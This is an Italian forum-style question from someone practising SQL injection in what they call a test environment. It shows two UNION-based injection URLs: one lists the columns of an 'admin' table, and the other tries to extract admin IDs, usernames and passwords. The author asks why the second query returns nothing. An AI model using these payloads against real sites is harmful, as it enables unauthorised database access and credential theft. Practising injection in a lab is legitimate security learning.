Sto praticando l'iniezione SQL. Sono stato in grado di ottenere i nomi delle colonne e i nomi delle tabelle in un ambiente di test.
query 1. Eseguendo sotto query, vedo adminId, adminUsername, adminPassword
http://www.sqlexample.com/index.php?id=-2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=admin;--
query 2. Ora elaborando la query come di seguito, non vedo nulla.
http://www.sqlexample.com/index.php?id=-2 union select 1,2,group_concat(adminId,0x3a,adminUsername,0x3a,adminPassword),4,5,6,7 from admin;--
Sono confuso sul motivo per cui non mostra il nome utente, i campi della colonna password con query2, quando query1 mostra risultati con successo?